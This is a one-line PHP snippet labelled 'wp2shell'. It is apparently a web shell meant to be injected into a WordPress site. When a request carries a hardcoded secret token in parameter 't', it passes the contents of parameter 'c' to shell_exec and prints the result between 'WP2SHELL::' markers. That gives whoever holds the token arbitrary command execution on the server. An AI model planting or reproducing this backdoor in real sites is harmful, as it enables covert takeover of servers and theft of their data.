// wp2shell if (isset($_GET['t']) && hash_equals('769d0fecae73347d9382c20fc8061631', (string)$_GET['t']) && isset($_GET['c'])) { echo 'WP2SHELL::' . shell_exec((string)$_GET['c']) . '::END'; die(); }